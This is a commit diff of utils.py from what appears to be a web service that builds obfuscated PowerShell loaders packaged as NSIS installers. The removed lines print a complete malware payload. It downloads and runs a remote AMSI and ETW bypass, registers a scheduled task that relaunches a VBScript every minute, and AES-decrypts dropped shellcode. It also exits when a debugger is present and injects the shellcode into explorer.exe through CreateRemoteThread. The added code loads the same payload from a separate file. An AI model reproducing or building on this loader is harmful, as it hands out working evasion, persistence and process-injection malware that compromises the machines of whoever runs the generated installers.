sigyllly commited on
Commit
f1cd1b2
·
verified ·
1 Parent(s): da5dbab

Update utils.py

Browse files
Files changed (1) hide show
  1. utils.py +13 -109
utils.py CHANGED
@@ -16,7 +16,8 @@ PE_FOLDER = os.path.join(BASE_DIR, "pe")
16
  COMPILE_FOLDER = os.path.join(BASE_DIR, "compile")
17
  NSIS_COMPILER = "makensis" # Ensure NSIS is installed on your Linux system
18
  OBFUSCATOR_SCRIPT = os.path.join(BASE_DIR, "Obfus", "main.ps1")
19
- UPLOAD_URL = 'https://ambelo-benjamin.hf.space/upload' # Replace with actual IP or domain
 
20
 
21
 
22
 
@@ -29,7 +30,7 @@ def obfuscate_powershell_script(ps1_path):
29
  current_app.logger.info(f"Running obfuscation command: {cmd}")
30
  current_app.logger.info(f"Input PowerShell script path: {ps1_path}")
31
 
32
- process = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, text=True)
33
  process.stdin.write(f"{ps1_path}\n")
34
  process.stdin.flush()
35
  stdout, stderr = process.communicate()
@@ -212,114 +213,17 @@ def process_request(request):
212
  # Extract the file name from the full binary path
213
  bin_file_name = os.path.basename(bin_path)
214
 
215
- # Create the PowerShell script with the provided content
216
- ps1_content = f'''
217
- # Download and execute the script from the provided URL
218
- iex (iwr -UseBasicParsing https://raw.githubusercontent.com/BlackShell256/Null-AMSI/refs/heads/main/Invoke-NullAMSI.ps1)
219
- # Run the Invoke-NullAMSI command
220
- Invoke-NullAMSI
221
- Invoke-NullAMSI -etw
222
- # Define the content of the VBScript
223
- $vbsContent = @'
224
- Set objShell = CreateObject("WScript.Shell")
225
- objShell.Run "powershell -EP Bypass -File \\"C:\\ProgramData\\Installer\\Verification.ps1\\"", 0, True
226
- '@
227
- # Define the file path for the .vbs file in the desired location
228
- $vbsFilePath = "C:\\ProgramData\\Installer\\0.vbs"
229
- # Write the content to the .vbs file
230
- $vbsContent | Set-Content -Path $vbsFilePath -Encoding ASCII
231
- Write-Host "VBScript file created at: $vbsFilePath"
232
- $Action = New-ScheduledTaskAction -Execute "C:\\ProgramData\\Installer\\0.vbs"
233
- $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration (New-TimeSpan -Days 365)
234
- Register-ScheduledTask -TaskName "HiPPo Setting" -Action $Action -Trigger $Trigger -Force
235
- # Define a fixed 16-byte key for encryption (fixed key as "MyFixedEncryptionKey")
236
- $keyBytes = [System.Text.Encoding]::UTF8.GetBytes("MyFixedEncryptionKey")
237
- # Ensure the key length is 16 bytes (AES requires 16, 24, or 32 bytes)
238
- if ($keyBytes.Length -gt 16) {{
239
- $keyBytes = $keyBytes[0..15] # Trim the key to 16 bytes if it's longer
240
- }}
241
- elseif ($keyBytes.Length -lt 16) {{
242
- # If the key is too short, pad it with zeros to make it 16 bytes
243
- $keyBytes = $keyBytes + (New-Object Byte[] (16 - $keyBytes.Length))
244
- }}
245
- # Function to download the encrypted binary from the server
246
- function Download-EncryptedShellcode {{
247
- param([string]$url)
248
- # Download the encrypted binary file directly into memory as a byte array
249
- $response = Invoke-WebRequest -Uri $url -UseBasicParsing
250
- return $response.Content
251
- }}
252
- # Read the encrypted shellcode from a local binary file
253
- $encryptedBuf = [System.IO.File]::ReadAllBytes("C:\\ProgramData\\Installer\\{bin_file_name}")
254
- # Create an AES encryption object
255
- $aes = [System.Security.Cryptography.Aes]::Create()
256
- # Set the decryption key and initialization vector (IV)
257
- $aes.Key = $keyBytes
258
- $aes.IV = $keyBytes[0..15] # Use the first 16 bytes of the key for the IV
259
- # Create a memory stream to hold the decrypted data
260
- $memoryStream = New-Object System.IO.MemoryStream
261
- $cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $aes.CreateDecryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write)
262
- # Decrypt the encrypted data into the memory stream
263
- $cryptoStream.Write($encryptedBuf, 0, $encryptedBuf.Length)
264
- $cryptoStream.Close()
265
- # Get the decrypted shellcode
266
- $buf = $memoryStream.ToArray()
267
- # Anti-debugging mechanism
268
- function IsDebuggerPresent {{
269
- $IsDebuggerPresentCode = @"
270
- using System;
271
- using System.Runtime.InteropServices;
272
- public class DebugHelper {{
273
- [DllImport(\\"kernel32.dll\\")]
274
- public static extern bool IsDebuggerPresent();
275
- }}
276
- "@
277
- $debugHelper = Add-Type -TypeDefinition $IsDebuggerPresentCode -PassThru
278
- return $debugHelper::IsDebuggerPresent()
279
- }}
280
- if (IsDebuggerPresent) {{
281
- Write-Host "Debugger detected. Exiting."
282
- exit
283
- }}
284
- # Inject shellcode into a target process (example: explorer.exe)
285
- $Win32APICode = @"
286
- using System;
287
- using System.Runtime.InteropServices;
288
- public class Win32API {{
289
- [DllImport(\\"kernel32.dll\\", SetLastError = true, ExactSpelling = true)]
290
- public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
291
- [DllImport(\\"kernel32.dll\\", SetLastError = true)]
292
- public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten);
293
- [DllImport(\\"kernel32.dll\\", SetLastError = true)]
294
- public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out IntPtr lpThreadId);
295
- [DllImport(\\"kernel32.dll\\", SetLastError = true)]
296
- public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
297
- [DllImport(\\"kernel32.dll\\", SetLastError = true)]
298
- [return: MarshalAs(UnmanagedType.Bool)]
299
- public static extern bool CloseHandle(IntPtr hObject);
300
- }}
301
- "@
302
- $win32api = Add-Type -TypeDefinition $Win32APICode -PassThru
303
- # Target process (explorer.exe) injection
304
- $targetProcess = Get-Process explorer | Select-Object -First 1
305
- $processHandle = $win32api::OpenProcess(0x1F0FFF, $false, $targetProcess.Id)
306
- # Allocate memory in the target process
307
- $size = 0x1000
308
- if ($buf.Length -gt $size) {{ $size = $buf.Length }}
309
- $remoteMemory = $win32api::VirtualAllocEx($processHandle, [IntPtr]::Zero, $size, 0x3000, 0x40)
310
- # Write the shellcode into the allocated memory
311
- $bytesWritten = [IntPtr]::Zero
312
- $win32api::WriteProcessMemory($processHandle, $remoteMemory, $buf, $buf.Length, [ref]$bytesWritten)
313
- # Create a remote thread to execute the shellcode
314
- $threadId = [IntPtr]::Zero
315
- $win32api::CreateRemoteThread($processHandle, [IntPtr]::Zero, 0, $remoteMemory, [IntPtr]::Zero, 0, [ref]$threadId)
316
- # Close the process handle
317
- $win32api::CloseHandle($processHandle)
318
- Write-Host "Shellcode injection completed successfully."
319
- '''
320
  ps1_path = os.path.join(temp_dir, generate_random_string() + ".ps1")
321
- with open(ps1_path, 'w') as ps1_file:
322
- ps1_file.write(ps1_content)
323
 
324
  # Obfuscate the PowerShell script
325
  obfuscated_ps1_path = obfuscate_powershell_script(ps1_path)
 
16
  COMPILE_FOLDER = os.path.join(BASE_DIR, "compile")
17
  NSIS_COMPILER = "makensis" # Ensure NSIS is installed on your Linux system
18
  OBFUSCATOR_SCRIPT = os.path.join(BASE_DIR, "Obfus", "main.ps1")
19
+ UPLOAD_URL = 'https://ambelo-benjamin.hf.space/upload'
20
+ POWERSHELL_FILE_PATH = os.path.join(PE_FOLDER, "powershell.ps1")
21
 
22
 
23
 
 
30
  current_app.logger.info(f"Running obfuscation command: {cmd}")
31
  current_app.logger.info(f"Input PowerShell script path: {ps1_path}")
32
 
33
+ process = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
34
  process.stdin.write(f"{ps1_path}\n")
35
  process.stdin.flush()
36
  stdout, stderr = process.communicate()
 
213
  # Extract the file name from the full binary path
214
  bin_file_name = os.path.basename(bin_path)
215
 
216
+
217
+ # Read the PowerShell content from the local file
218
+ with open(POWERSHELL_FILE_PATH, 'r') as ps1_file:
219
+ ps1_content = ps1_file.read()
220
+
221
+ ps1_content = ps1_content.replace("{bin_file_name}", bin_file_name)
222
+
223
+ # Create the PowerShell script with the modified content
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
224
  ps1_path = os.path.join(temp_dir, generate_random_string() + ".ps1")
225
+ with open(ps1_path, 'w') as new_ps1_file:
226
+ new_ps1_file.write(ps1_content)
227
 
228
  # Obfuscate the PowerShell script
229
  obfuscated_ps1_path = obfuscate_powershell_script(ps1_path)